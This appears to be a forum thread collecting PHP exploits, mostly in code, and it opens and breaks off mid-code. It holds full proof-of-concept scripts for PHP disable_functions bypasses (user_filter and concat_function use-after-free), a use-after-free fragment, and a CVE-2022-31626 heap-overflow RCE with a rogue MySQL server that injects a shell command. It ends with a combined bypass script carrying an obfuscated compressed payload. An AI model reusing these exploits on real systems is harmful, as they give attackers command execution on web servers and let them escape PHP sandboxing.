list($data_addr, $text_size, $data_size) = $elf; for($i = 0; $i < $data_size / 8; $i++) { $leak = read($data_addr + $i * 8); if($leak - $base > 0 && $leak < $data_addr) { $deref = read($leak); # 'constant' constant check if($deref != 0x746e6174736e6f63) continue; } else continue; $leak = read($data_addr + ($i + 4) * 8); if($leak - $base > 0 && $leak < $data_addr) { $deref = read($leak); # 'bin2hex' constant check if($deref != 0x786568326e6962) continue; } else continue; return $data_addr + $i * 8; }}function get_system($basic_funcs){ $addr = $basic_funcs; do { $f_entry = read($addr); $f_name = read($f_entry, 6); if($f_name == 0x6d6574737973) { # system return read($addr + 8); } $addr += 0x20; } while($f_entry != 0); return false;}function get_system_address($binary_leak){ $base = get_binary_base($binary_leak); print('ELF base: 0x' .dechex($base) . "\n"); $elf = parse_elf($base); $basic_funcs = get_basic_funcs($base, $elf); print('Basic functions: 0x' .dechex($basic_funcs) . "\n"); $zif_system = get_system($basic_funcs); return $zif_system;}$dlls = [];$strs = [];$rw_dll = new SplDoublyLinkedList();# Create a chain of dangling triggers, which will all in turn# free current->next, push an element to the next list, and free current# This will make sure that every current->next points the same memory block,# which we will UAF.for($i = 0; $i < NB_DANGLING; $i++){ $dlls[$i] = new SplDoublyLinkedList(); $dlls[$i]->push(new DanglingTrigger($i)); $dlls[$i]->rewind();}# We want our UAF'd list element to be before two strings, so that we can# obtain the address of the first string, and increase is size. We then have# R/W over all memory after the obtained address.define('NB_STRS', 50);for($i = 0; $i < NB_STRS; $i++){ $strs[] = str_shuffle(str_repeat('A', SIZE_ELEM_STR)); i2s($strs[$i], 0, STR_MARKER); i2s($strs[$i], 8, $i, 7);}# Free one string in the middle, ...$strs[NB_STRS - 20] = 123;# ... and put the to-be-UAF'd list element instead.$dlls[0]->push(0);# Setup the last DLlist, which will exploit the UAF$dlls[NB_DANGLING] = new SplDoublyLinkedList();$dlls[NB_DANGLING]->push(new UAFTrigger());$dlls[NB_DANGLING]->rewind();# Trigger the bug on the first list$dlls[0]->offsetUnset(0);
Bypass Disable Functions to get things done https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https://www.freebuf.com/articles/network/263540.html
PHP 7.0-8.0 disable_functions bypass [user_filter] https://github.com/mm0r1/exploits/tree/master/php-filter-bypass Spoiler: README.md PHP 7.0-8.0 disable_functions bypass [user_filter] This exploit uses a bug reported over 10 years ago. As usual, the PoC was tested on various php builds for Debian/Ubuntu/CentOS/FreeBSD with cli/fpm/apache2 server APIs and found to work reliably. Targets 5.* - exploitable with minor changes to the PoC 7.0 - all versions to date 7.1 - all versions to date 7.2 - all versions to date 7.3 - all versions to date 7.4 - all versions to date 8.0 - all versions to date Fix Stop relying on disable_functions (or any other php.ini settings) for security. Post scriptum There are many memory corruption vulnerabilities in PHP - some of them are publicly known, others are not. Regardless, PHP devs don't care much about these, as you can see in the bug reports. This PoC is for demonstration purposes only. The exploits that could've been developed/used during the past decade might be not. Spoiler: exploit.php PHP: <?php# PHP 7.0-8.0 disable_functions bypass PoC (*nix only)## Bug: https://bugs.php.net/bug.php?id=54350## This exploit should work on all PHP 7.0-8.0 versions# released as of 2021-10-06## Author: https://github.com/mm0r1pwn('uname -a');function pwn($cmd) { define('LOGGING', false); define('CHUNK_DATA_SIZE', 0x60); define('CHUNK_SIZE', ZEND_DEBUG_BUILD ? CHUNK_DATA_SIZE + 0x20 : CHUNK_DATA_SIZE); define('FILTER_SIZE', ZEND_DEBUG_BUILD ? 0x70 : 0x50); define('STRING_SIZE', CHUNK_DATA_SIZE - 0x18 - 1); define('CMD', $cmd); for($i = 0; $i < 10; $i++) { $groom[] = Pwn::alloc(STRING_SIZE); } stream_filter_register('pwn_filter', 'Pwn'); $fd = fopen('php://memory', 'w'); stream_filter_append($fd,'pwn_filter'); fwrite($fd, 'x');}class Helper { public $a, $b, $c; }class Pwn extends php_user_filter { private $abc, $abc_addr; private $helper, $helper_addr, $helper_off; private $uafp, $hfp; public function filter($in, $out, &$consumed, $closing) { if($closing) return; stream_bucket_make_writeable($in); $this->filtername = Pwn::alloc(STRING_SIZE); fclose($this->stream); $this->go(); return PSFS_PASS_ON; } private function go() { $this->abc = &$this->filtername; $this->make_uaf_obj(); $this->helper = new Helper; $this->helper->b = function($x) {}; $this->helper_addr = $this->str2ptr(CHUNK_SIZE * 2 - 0x18) - CHUNK_SIZE * 2; $this->log("helper @ 0x%x", $this->helper_addr); $this->abc_addr = $this->helper_addr - CHUNK_SIZE; $this->log("abc @ 0x%x", $this->abc_addr); $this->helper_off = $this->helper_addr - $this->abc_addr - 0x18; $helper_handlers = $this->str2ptr(CHUNK_SIZE); $this->log("helper handlers @ 0x%x", $helper_handlers); $this->prepare_leaker(); $binary_leak = $this->read($helper_handlers + 8); $this->log("binary leak @ 0x%x", $binary_leak); $this->prepare_cleanup($binary_leak); $closure_addr = $this->str2ptr($this->helper_off + 0x38); $this->log("real closure @ 0x%x", $closure_addr); $closure_ce = $this->read($closure_addr + 0x10); $this->log("closure class_entry @ 0x%x", $closure_ce); $basic_funcs = $this->get_basic_funcs($closure_ce); $this->log("basic_functions @ 0x%x", $basic_funcs); $zif_system = $this->get_system($basic_funcs); $this->log("zif_system @ 0x%x", $zif_system); $fake_closure_off = $this->helper_off + CHUNK_SIZE * 2; for($i = 0; $i < 0x138; $i += 8) { $this->write($fake_closure_off + $i, $this->read($closure_addr + $i)); } $this->write($fake_closure_off + 0x38, 1, 4); $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68; $this->write($fake_closure_off + $handler_offset, $zif_system); $fake_closure_addr = $this->helper_addr + $fake_closure_off - $this->helper_off; $this->write($this->helper_off + 0x38, $fake_closure_addr); $this->log("fake closure @ 0x%x", $fake_closure_addr); $this->cleanup(); ($this->helper->b)(CMD); } private function make_uaf_obj() { $this->uafp = fopen('php://memory', 'w'); fwrite($this->uafp, pack('QQQ', 1, 0, 0xDEADBAADC0DE)); for($i = 0; $i < STRING_SIZE; $i++) { fwrite($this->uafp, "\x00"); } } private function prepare_leaker() { $str_off = $this->helper_off + CHUNK_SIZE + 8; $this->write($str_off, 2); $this->write($str_off + 0x10, 6); $val_off = $this->helper_off + 0x48; $this->write($val_off, $this->helper_addr + CHUNK_SIZE + 8); $this->write($val_off + 8, 0xA); } private function prepare_cleanup($binary_leak) { $ret_gadget = $binary_leak; do { --$ret_gadget; } while($this->read($ret_gadget, 1) !== 0xC3); $this->log("ret gadget = 0x%x", $ret_gadget); $this->write(0, $this->abc_addr + 0x20 - (PHP_MAJOR_VERSION === 8 ? 0x50 : 0x60)); $this->write(8, $ret_gadget); } private function read($addr, $n = 8) { $this->write($this->helper_off + CHUNK_SIZE + 16, $addr - 0x10); $value = strlen($this->helper->c); if($n !== 8) { $value &= (1 << ($n << 3)) - 1; } return $value; } private function write($p, $v, $n = 8) { for($i = 0; $i < $n; $i++) { $this->abc[$p + $i] = chr($v & 0xff); $v >>= 8; } } private function get_basic_funcs($addr) { while(true) { $addr -= 0x10; if($this->read($addr, 4) === 0xA8 && in_array($this->read($addr + 4, 4), [20151012, 20160303, 20170718, 20180731, 20190902, 20200930])) { $module_name_addr = $this->read($addr + 0x20); $module_name = $this->read($module_name_addr); if($module_name === 0x647261646e617473) { $this->log("standard module @ 0x%x", $addr); return $this->read($addr + 0x28); } } } } private function get_system($basic_funcs) { $addr = $basic_funcs; do { $f_entry = $this->read($addr); $f_name = $this->read($f_entry, 6); if($f_name === 0x6d6574737973) { return $this->read($addr + 8); } $addr += 0x20; } while($f_entry !== 0); } private function cleanup() { $this->hfp = fopen('php://memory', 'w'); fwrite($this->hfp, pack('QQ', 0, $this->abc_addr)); for($i = 0; $i < FILTER_SIZE - 0x10; $i++) { fwrite($this->hfp, "\x00"); } } private function str2ptr($p = 0, $n = 8) { $address = 0; for($j = $n - 1; $j >= 0; $j--) { $address <<= 8; $address |= ord($this->abc[$p + $j]); } return $address; } private function ptr2str($ptr, $n = 8) { $out = ''; for ($i = 0; $i < $n; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } private function log($format, $val = '') { if(LOGGING) { printf("{$format}\n", $val); } } static function alloc($size) { return str_shuffle(str_repeat('A', $size)); }}?>
PHP-FPM 5.3.7-8.0.11 local root https://www.ambionics.io/blog/php-fpm-local-root Spoiler: expoloit The exploit will be available at a later date.
PHP 7.3-8.1 disable_functions bypass [concat_function] Spoiler: Exploit Code: <?php # PHP 7.3-8.1 disable_functions bypass PoC (*nix only) # # Bug: https://bugs.php.net/bug.php?id=81705 # # This exploit should work on all PHP 7.3-8.1 versions # released as of 2022-01-07 # # Author: https://github.com/mm0r1 new Pwn("uname -a"); class Helper { public $a, $b, $c; } class Pwn { const LOGGING = false; const CHUNK_DATA_SIZE = 0x60; const CHUNK_SIZE = ZEND_DEBUG_BUILD ? self::CHUNK_DATA_SIZE + 0x20 : self::CHUNK_DATA_SIZE; const STRING_SIZE = self::CHUNK_DATA_SIZE - 0x18 - 1; const HT_SIZE = 0x118; const HT_STRING_SIZE = self::HT_SIZE - 0x18 - 1; public function __construct($cmd) { for($i = 0; $i < 10; $i++) { $groom[] = self::alloc(self::STRING_SIZE); $groom[] = self::alloc(self::HT_STRING_SIZE); } $concat_str_addr = self::str2ptr($this->heap_leak(), 16); $fill = self::alloc(self::STRING_SIZE); $this->abc = self::alloc(self::STRING_SIZE); $abc_addr = $concat_str_addr + self::CHUNK_SIZE; self::log("abc @ 0x%x", $abc_addr); $this->free($abc_addr); $this->helper = new Helper; if(strlen($this->abc) < 0x1337) { self::log("uaf failed"); return; } $this->helper->a = "leet"; $this->helper->b = function($x) {}; $this->helper->c = 0xfeedface; $helper_handlers = $this->rel_read(0); self::log("helper handlers @ 0x%x", $helper_handlers); $closure_addr = $this->rel_read(0x20); self::log("real closure @ 0x%x", $closure_addr); $closure_ce = $this->read($closure_addr + 0x10); self::log("closure class_entry @ 0x%x", $closure_ce); $basic_funcs = $this->get_basic_funcs($closure_ce); self::log("basic_functions @ 0x%x", $basic_funcs); $zif_system = $this->get_system($basic_funcs); self::log("zif_system @ 0x%x", $zif_system); $fake_closure_off = 0x70; for($i = 0; $i < 0x138; $i += 8) { $this->rel_write($fake_closure_off + $i, $this->read($closure_addr + $i)); } $this->rel_write($fake_closure_off + 0x38, 1, 4); $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68; $this->rel_write($fake_closure_off + $handler_offset, $zif_system); $fake_closure_addr = $abc_addr + $fake_closure_off + 0x18; self::log("fake closure @ 0x%x", $fake_closure_addr); $this->rel_write(0x20, $fake_closure_addr); ($this->helper->b)($cmd); $this->rel_write(0x20, $closure_addr); unset($this->helper->b); } private function heap_leak() { $arr = [[], []]; set_error_handler(function() use (&$arr, &$buf) { $arr = 1; $buf = str_repeat("\x00", self::HT_STRING_SIZE); }); $arr[1] .= self::alloc(self::STRING_SIZE - strlen("Array")); return $buf; } private function free($addr) { $payload = pack("Q*", 0xdeadbeef, 0xcafebabe, $addr); $payload .= str_repeat("A", self::HT_STRING_SIZE - strlen($payload)); $arr = [[], []]; set_error_handler(function() use (&$arr, &$buf, &$payload) { $arr = 1; $buf = str_repeat($payload, 1); }); $arr[1] .= "x"; } private function rel_read($offset) { return self::str2ptr($this->abc, $offset); } private function rel_write($offset, $value, $n = 8) { for ($i = 0; $i < $n; $i++) { $this->abc[$offset + $i] = chr($value & 0xff); $value >>= 8; } } private function read($addr, $n = 8) { $this->rel_write(0x10, $addr - 0x10); $value = strlen($this->helper->a); if($n !== 8) { $value &= (1 << ($n << 3)) - 1; } return $value; } private function get_system($basic_funcs) { $addr = $basic_funcs; do { $f_entry = $this->read($addr); $f_name = $this->read($f_entry, 6); if($f_name === 0x6d6574737973) { return $this->read($addr + 8); } $addr += 0x20; } while($f_entry !== 0); } private function get_basic_funcs($addr) { while(true) { // In rare instances the standard module might lie after the addr we're starting // the search from. This will result in a SIGSGV when the search reaches an unmapped page. // In that case, changing the direction of the search should fix the crash. // $addr += 0x10; $addr -= 0x10; if($this->read($addr, 4) === 0xA8 && in_array($this->read($addr + 4, 4), [20180731, 20190902, 20200930, 20210902])) { $module_name_addr = $this->read($addr + 0x20); $module_name = $this->read($module_name_addr); if($module_name === 0x647261646e617473) { self::log("standard module @ 0x%x", $addr); return $this->read($addr + 0x28); } } } } private function log($format, $val = "") { if(self::LOGGING) { printf("{$format}\n", $val); } } static function alloc($size) { return str_shuffle(str_repeat("A", $size)); } static function str2ptr($str, $p = 0, $n = 8) { $address = 0; for($j = $n - 1; $j >= 0; $j--) { $address <<= 8; $address |= ord($str[$p + $j]); } return $address; } } ?>
mysqlnd/pdo password buffer overflow leading to RCE (< 7.4.30, < 8.0.20, < 8.1.7) Spoiler: README.md Remote Exploitation Technique For CVE 2022-31626 Bug summary We present new technique for remote exploitation of heap overflow in PHP web applications. PHP bug #81719 is remote exploitable with this technique in PHP <= 7.4.29. Bug #81719 is Heap Overflow Bug which allowes to overwrite 4 bytes. Scripts demonstrate how to get code execution with overwriting 4 bytes. Files: mysql_admin.php - simple web application rogue_sql_server.py - script to run fake mysql server (run with python2) exploit_poc.py - script to send http-requests to web app. Spoiler: exploit_poc.py Code: import struct import requests ''' Authors: Daniil Sadyrin (http://twitter.com/cyberguru007), Alexey Moskvin https://github.com/CFandR-github ''' ''' Set sapi_ub_write var with address of sapi_module.ub_write symbol in exploit_poc.py Set system var in rogue_sql_server.py with address of system symbol Set need_memleak var with 1 in both exploit_poc.py and rogue_sql_server.py to get memory leak. Set to 0 for code execution PHP process heap can have differences depending on environment / configuration. To prepare heap, play with POST parsing: add or remove some variables in "payload" array. ''' N = 23 BIN = 160 need_memleak = 0 payload = [ ('server', '127.0.0.1'), ('username', 'root'), ('db', 'php'), ('password', 'v' * (9 * 0x1000 - 4)) ] for i in range(N): payload.append(('key%s' % i , chr(ord('B') + i) * (0x1000 - 100))) if need_memleak: #memleak payload.append(('hi1', 'T' * (135 - 24 - 3))) payload.append(('hi2', 'T' * (135 - 24 - 3))) payload.append(('hi3', 'T' * (135 - 24 - 3))) payload.append(('hi4', 'T' * (135 - 24 - 3))) payload.append(('hi5', 'T' * (135 - 24 - 3))) payload.append(('hi6', 'T' * (135 - 24 - 3))) payload.append(('hi7', 'T' * (135 - 24 - 3))) else: #rce sapi_ub_write = 0x7f6eb66071b0 fake_chunk = ('Y' * 0x48).encode('utf-8') fake_chunk += struct.pack('<Q', sapi_ub_write - 24) #next_free_slot for fake chunk fake_chunk += ('T' * (135 - 24 - 3 - len(fake_chunk))).encode('utf-8') payload.append(('hi1', 'T' * (135 - 24 - 3))) payload.append(('hi2', 'T' * (135 - 24 - 3))) payload.append(('hi3', 'T' * (135 - 24 - 3))) payload.append(('hi4', 'T' * (135 - 24 - 3))) payload.append(('hi5', fake_chunk)) for i in range(N): if i % 2 == 0 and i < int(N / 1.5): continue payload.append(('key%s' % i, 'helloworld')) if need_memleak: #memleak payload.append(('hi1', 'null')) payload.append(('hi7', 'null')) payload.append(('hi6', 'null')) payload.append(('hi5', 'null')) payload.append(('hi4', 'null')) payload.append(('hi3', 'null')) payload.append(('hi2', 'null')) else: #rce payload.append(('hi1', 'null')) payload.append(('hi2', 'null')) payload.append(('hi3', 'null')) payload.append(('hi4', 'null')) x = requests.post('http://127.0.0.1/research/mysql_admin.php', data = payload) data = x.content print(data) Spoiler: rogue_sql_server.py Code: import os import sys import struct import socket import warnings import asynchat import asyncore from mysql_constants import * ''' Authors: Daniil Sadyrin (http://twitter.com/cyberguru007), Alexey Moskvin https://github.com/CFandR-github ''' class Packet: def __init__(self): pass def pack_1_byte(self, v): return struct.pack('B', v) def pack_2_bytes(self, v): return struct.pack('BB', v & 0xff, v >> 8) def pack_3_bytes(self, v): return struct.pack('BBB', v & 0xff, (v >> 8) & 0xff, (v >> 16) & 0xff) def pack_4_bytes(self, v): return struct.pack('I', v) def pack(self, nested = True): if hasattr(self, 'get_to_str'): self.data = self.get_to_str() else: raise Exception("Eror") if not nested: r = '' r += self.pack_3_bytes(len(self.data)) r += self.pack_1_byte(self.num) r += self.data else: r = self.data return r class LengthEncodedInteger(Packet): def __init__(self, value): self.value = value def get_to_str(self): if self.value < 251: return self.pack_1_byte(self.value) elif self.value >= 251 and self.value < (1<<16): return '\xfc' + self.pack_2_bytes(self.value) elif self.value >= (1<<16) and self.value < (1<<24): return '\xfd' + self.pack_3_bytes(self.value) elif self.value >= (1<<24) and self.value < (1<<64): return '\xfe' + self.pack_4_bytes(self.value) class LengthEncodedString(Packet): def __init__(self, text): self.text = text def get_to_str(self): r = LengthEncodedInteger(len(self.text)).pack() r += self.text return r class ColumnDefinition(Packet): def __init__(self, catalog, schema, table, org_table, name, org_name, charsetnr, length, type_, flags, decimals): self.catalog = catalog self.schema = schema self.table = table self.org_table = org_table self.name = name self.org_name = org_name self.next_length = 0x0c self.charsetnr = charsetnr self.length = length self.type = type_ self.flags = flags self.decimals = decimals def get_to_str(self): r = '' r += LengthEncodedString(self.catalog).pack() r += LengthEncodedString(self.schema).pack() r += LengthEncodedString(self.table).pack() r += LengthEncodedString(self.org_table).pack() r += LengthEncodedString(self.name).pack() r += LengthEncodedString(self.org_name).pack() r += LengthEncodedInteger(self.next_length).pack() r += self.pack_2_bytes(self.charsetnr) r += self.pack_4_bytes(self.length) r += self.pack_1_byte(self.type) r += self.pack_2_bytes(self.flags) r += self.pack_1_byte(self.decimals) r += '\x00\x00' return r class EOF(Packet): def __init__(self, more_results = False): self.EOF = 0xfe self.warnings = 0 self.server_status = 0x002 | (0x8 if more_results else 0) def get_to_str(self): r = '' r += self.pack_1_byte(self.EOF) r += self.pack_2_bytes(self.warnings) r += self.pack_2_bytes(self.server_status) return r class ResultsetRow(Packet): def __init__(self, row): self.row = row def get_to_str(self): return ''.join([LengthEncodedString(v).pack() for v in self.row]) class COM_QUERY_RESPONSE(Packet): def __init__(self, responce): # ProtocolText::Resultset self.responce = responce def get_to_str(self): resp_str = '' total_num = 1 try: for i, resp in enumerate(self.responce): self.column_count, self.column_def, self.rows = resp r = '' arr = [] arr.append(LengthEncodedInteger(self.column_count)) for c in self.column_def: arr.append(ColumnDefinition(*c)) arr.append(EOF()) for row in self.rows: arr.append(ResultsetRow(row)) arr.append(EOF(more_results = (True if i != len(self.responce) - 1 else False))) for p in arr: p.num = total_num total_num += 1 r += p.pack(nested = False) resp_str += r except: print 'Error on line {}'.format(sys.exc_info()[-1].tb_lineno) return resp_str class COM_QUIT(Packet): def __init__(self): self.cmd = 0x1 def get_to_str(self): return self.pack_1_byte(self.cmd) class COM_SET_OPTION(Packet): def __init__(self): self.com_set_option = 0x1b self.option_operation = 0 def get_to_str(self): return self.pack_1_byte(self.com_set_option) + self.pack_1_byte(self.option_operation) class PacketOK(Packet): def __init__(self): self.header = 0 self.affected_rows = 0 self.last_insert_id = 0 self.status_flags = 0x2 self.warnings = 0 def get_to_str(self): r = '' r += self.pack_1_byte(self.header) r += LengthEncodedInteger(self.affected_rows).pack() r += LengthEncodedInteger(self.last_insert_id).pack() r += self.pack_2_bytes(self.status_flags) r += self.pack_2_bytes(self.warnings) return r class AuthSwitch(Packet): def __init__(self): self.status = 0xfe self.auth_method_name = 'mysql_clear_password' self.auth_method_data = 'abc' def get_to_str(self): r = '' r += self.pack_1_byte(self.status) r += self.auth_method_name + '\x00' r += self.auth_method_data + '\x00' return r class Handshake(Packet): def __init__(self, protocol_version, server_version, connection_id, auth_plugin_data_part_1, capability_flag_1, character_set, status_flags, capability_flags_2, auth_plugin_data_len, auth_plugin_data_part_2, auth_plugin_name): self.protocol_version = protocol_version self.server_version = server_version self.connection_id = connection_id self.auth_plugin_data_part_1 = auth_plugin_data_part_1 self.filler = 0 self.capability_flag_1 = capability_flag_1 self.character_set = character_set self.status_flags = status_flags self.capability_flags_2 = capability_flags_2 self.auth_plugin_data_len = auth_plugin_data_len self.auth_plugin_data_part_2 = auth_plugin_data_part_2 self.auth_plugin_name = auth_plugin_name def get_to_str(self): r = '' r += self.pack_1_byte(self.protocol_version) r += self.server_version + '\x00' r += self.pack_4_bytes(self.connection_id) r += self.auth_plugin_data_part_1 r += self.pack_1_byte(self.filler) r += self.pack_2_bytes(self.capability_flag_1) r += self.pack_1_byte(self.character_set) r += self.pack_2_bytes(self.status_flags) r += self.pack_2_bytes(self.capability_flags_2) r += self.pack_1_byte(self.auth_plugin_data_len) r += '\x00' * 10 r += self.auth_plugin_data_part_2 r += self.pack_1_byte(self.filler) r += self.auth_plugin_name r += '\x00' return r class mysql_packet_handler(asynchat.async_chat): def __init__(self, addr): asynchat.async_chat.__init__(self, sock=addr[0]) self.addr = addr[1] self.ibuffer = [] self.set_terminator(3) self.state = 'len' plugin_name = 'caching_sha2_password' plugin_len = len(plugin_name) p = Handshake(10, '8.0.23', 27, 'A' * 8, 0xffff, 8, 0x2, 0xcfff, plugin_len, 'B' * 12, plugin_name) p.num = 0 self.push(p.pack(nested = False)) def push(self, data): print('Pushed: %r', data) data = str(data) asynchat.async_chat.push(self, data) def collect_incoming_data(self, data): print('Data recved: %r', data) self.ibuffer.append(data) def found_terminator(self): data = "".join(self.ibuffer) self.ibuffer = [] if self.state == 'len': len_bytes = ord(data[0]) + (ord(data[1]) << 8) + (ord(data[2]) << 16) + 1 self.set_terminator(len_bytes) self.state = 'data' elif self.state == 'data': packet_num = ord(data[0]) payload = data[1:] self.set_terminator(3) self.state = 'len' #print response print(repr(payload)) print('done') if ord(payload[0]) == 0x8d or ord(payload[0]) == 0x85: #switch auth packet p2 = AuthSwitch() p2.num = 2 self.push(p2.pack(nested = False)) elif payload.find('vvvvvvvvvvvvvv\x00') != -1: print('okay!!') p = PacketOK() p.num = 4 self.push(p.pack(nested = False)) elif ord(payload[0]) == 0x03: #select packet need_memleak = 0 if need_memleak: column_defs = [ ('def', 'test', 'a', "b", 'c', 'd', MysqlCollation.BINARY, 1000, FieldFlags.FIELD_TYPE_VAR_STRING, 0, 0), ('def', 'test', 'a', "b", 'c', 'd', MysqlCollation.BINARY, 1000, FieldFlags.FIELD_TYPE_VAR_STRING, 0, 0), ('def', 'test', 'a', "b", 'c', 'd', MysqlCollation.BINARY, 1000, FieldFlags.FIELD_TYPE_VAR_STRING, 0, 0), ('def', 'test', 'a', "b", 'c', 'd', MysqlCollation.BINARY, 1000, FieldFlags.FIELD_TYPE_VAR_STRING, 0, 0), ] str_len = 160 - 25 - 10 pad,gc,h,newlen = 0x51515151, 0x10, 0, 0x500 zend_string = struct.pack('<Q', pad) + struct.pack('<Q', gc) + struct.pack('<Q', h) + struct.pack('<Q', newlen) zend_string += 'U' * (str_len - len(zend_string)) num = len(column_defs) rows = [ ['A'*str_len,'B'*str_len,'C'*str_len,'D'*str_len], ['Q'*str_len,'R'*str_len,'Y'*str_len,'T'*str_len], [chr(0)*str_len,'L'*str_len,'M'*str_len,zend_string] ] else: column_defs = [ ('def', 'test', 'a', "bb';ls;#", 'c', 'd', MysqlCollation.BINARY, 1000, FieldFlags.FIELD_TYPE_VAR_STRING, 0, 0), ('def', 'test', 'a', "bb';ls;#", 'c', 'd', MysqlCollation.BINARY, 1000, FieldFlags.FIELD_TYPE_VAR_STRING, 0, 0), ('def', 'test', 'a', "bb';ls;#", 'c', 'd', MysqlCollation.BINARY, 1000, FieldFlags.FIELD_TYPE_VAR_STRING, 0, 0), ('def', 'test', 'a', "bb';ls;#", 'c', 'd', MysqlCollation.BINARY, 1000, FieldFlags.FIELD_TYPE_VAR_STRING, 0, 0), ] str_len = 160 - 25 - 10 num = len(column_defs) system = 0x7f6eba64a3a0 expl = struct.pack('<Q', system) expl += 'G' * (str_len - len(expl)) rows = [ ['A'*str_len,'B'*str_len,'C'*str_len,'D'*str_len], ['E'*str_len,'F'*str_len,expl,'hello'] ] p = COM_QUERY_RESPONSE([(num, column_defs, rows)]) p_str = p.pack() self.push(p_str) elif ord(payload[0]) == 0x1b: #set option packet p = EOF() p.num = 1 self.push(p.pack(nested = False)) elif ord(payload[0]) == 0x01: #close self.close_when_done() class mysql_listener(asyncore.dispatcher): def __init__(self, sock=None): asyncore.dispatcher.__init__(self, sock) if not sock: self.create_socket(socket.AF_INET, socket.SOCK_STREAM) self.set_reuse_addr() try: self.bind(('', 3306)) except socket.error: exit() self.listen(5) def handle_accept(self): pair = self.accept() if pair is not None: print('Conn from: %r', pair[1]) mysql_packet_handler(pair) z = mysql_listener() asyncore.loop() Writeup
Один индус Tarunkant Gupta решил провести эксперимент и повызывать пыхные функи передавая разные параметры и мониторя сисколы execve. Вроде нашел 4 штуки, которые можно эксплоитить через LD_PRELOAD (mb_send_mail,imap_mail,libvirt_connect,gnupg_init) Первые две мы знаем, других в паблике пока не видел. Еще не проверял, но выглядит реалистично. Код фаззера с познавательной ридми: https://github.com/tarunkant/fuzzphunc
Для удобства, объеденил некоторые универсальные байпасы в один скрипт: Spoiler: safemode PHP: <?phpecho safemode('uname -a');function safemode($cmd = 'check'){ if(!defined('PHP_VERSION_ID')) return false; $c = __FUNCTION__; $v = PHP_VERSION_ID; $pocs['cm_php_fpm'] = array('v' => ((strpos(php_sapi_name(), 'fpm') !== false) && is_int(array_search(true, array_map(function($f){if(function_exists($f)) return true;}, array('mail', 'error_log', 'imap_mail','mb_send_mail'))))), 'r' => 'execFPM($'.$c.')', 'c' =>'eJyNV21T20YQ/kxn+h8ORZmTMopkAyaEhFAGTPBMwK5x0ukkmRtZOmEVWdJIMoG2/Pfu7t35BZu2Mj7f7T63t7valyOZ5VGTFjmT9zI6H1w6djSN3b9+/mnLrmTNjlgSZrV8B2v4SxPHTsopUG9kg2CXkFt2PR2EzQToaZ4K4Dm8lnk8DdNMlMDgLgrYUtDJeZpJgDppLX5UaROOM+lwn7vsmAlx1hsKwQ5Z/VCjINHIaSnitIKjfB5wfxp3nCadSliTTHt6e56FNyAPOVq6T0YQP4GlKGeNiIq8kXlTG4zH+IvtYJzmQT3hvvUtt3z+gnFfC1QUlONz9gHpapuSGk2mRbyQ1HrT6SyZWE5KbaPRh/tA488ppPGg0ftjmLPjD8phJCwqYpTEcbElq6qoRCXLomrS/MZpqVO30O01uN1SgKy4sUCrp0wgCwLUhqv4iZPoKBDyPq1BJaueyCwTGBOW6xLKxMOC41hzr/jc0ocZidtpjWfiJh0kYHpRyTCaOGFVhQ+OheEBiqzobKXTsBSKY03HAsNILV0W1sxGRbU+m/RWfHMe6Ixrp+3BR+sHzxi0uDWrR/p95NoZeB5lAYS5x8azNIsHYXSrop3ehccW78vEhPuOwbO83+THmgzO4TVz3Eop4y6Fjc43jA+M/KcBa97XLM/S/NZZiUdD05oR8VFFUCWbWZUzZ7tuqrKo6Y3A8SrKMefo3EOV57jxEY8xjv3fLmDgc3SCXRIWDGmKGneg861v960WfNv6d+1L0bO83adS0qRhlv4pB2EVTrUwBcNHRdFijQ8fdn/93L0eicvu6KJ/xtkRpO7H7oh7T3DX3eGX7lAMhv1R/7T/SQEvRqNB0Pbba+iPJ6Pubye/i97VqDs8PzntKvzpx95GuBZ+dXKpgVkRhdmkqJs1KB4pLvrXo/8CDruX/VFXnJydDRW0vfPGb8Fnw/Gnw95gJM57n7pzFeYv7Al2cDEAmZe9K/Hl5NNnhf2jSHMHy5+30ce0L8yy4oeYVZlI8yibxfKI+yo4IKJ4P+cQUbyfJNz1NuyO0xqrvjBRVh8hdBOyKGUuxmEtoQU8CwpnTSFKqIpYLDB/VpSJwyY89LgPysociY4us/IuzByUvb8nYkkcqGiaoKEkxcXyBjmOdRntIqOweKx2ueVTTZsDdDCrq6CmRqPR7HXDXqfcXTXFXVrr6YasmGfV3r8xO6pYIFvnv0at5bcpVNTx7yBtMSIgeq97/SusIjZahnVJhQIP7sIqqGZ5AB4MsJaReRS36yxDeAanupx9J6vFAfbd19Z3KCv448PYpnFnEwnH3e9YToNXMHa4xzv+Lo17NCrKPoxv8Ou3aGzTuEPjLo2IPiDuAXEPiHtA3APgvgqUokXZLBRVJOhdeYGNHiZQYLFRc926TbfTHsTuhTOXzRlkONJh4jIS//U7CkOcz/HK4CPP56+hHfl1Ed3yuSKEXFSBw7etVmvtaNIYT4AJtc3FDe4XUFeGU4FSsdtkKTQbh7aAn9k2CA845k8TlYdBQAk9y9N7nLs+wjymzPeM9R5r68uCCTo4SnUtTTCXydUYXG26OlL1zXIiw1jFhz0u4oe5g6llJnCPqp9sI+aPCSSfs53IQtlrrgQ2tEm8TSUQ9mbjXuvtvrkpAVohjpj1rYIS6LKl28JcGUg1whH5UbXl9SO1xv5zxyVRVtRSgbVJJv+N/1DAmrs2NUY7jckFuF6EKJCw+pHTyANLMUlIDI1b+UAdAqrhTGqv0y5QHH3qWKdXlgevF8qng2jXc9rv3++2XfY3M2S1WV/JzW4EP6EQTt9OFmGh6xYZsaeVXr+KLKPs5qGUC/MsSxWw+eWjLqs0bxIHbx7tl9HiQ7cNKt9KBM3SmAVsp7MPAmH6kqZ0m9PWkT4Gskp8DvySHQDR1Ogl3dALCHm3SoPdeK+XYUM6g47OmkBX/1ewuaz/A3c4q58='); $pocs['mm0r1_filter'] = array('v' => ($v >= 70000 && $v <= 70234 || $v >= 70300 && $v <= 70333 || $v >= 70400 && $v <= 70425 || $v > 80000 && $v < 80013), 'r' => 'pwn($'.$c.')', 'c' => 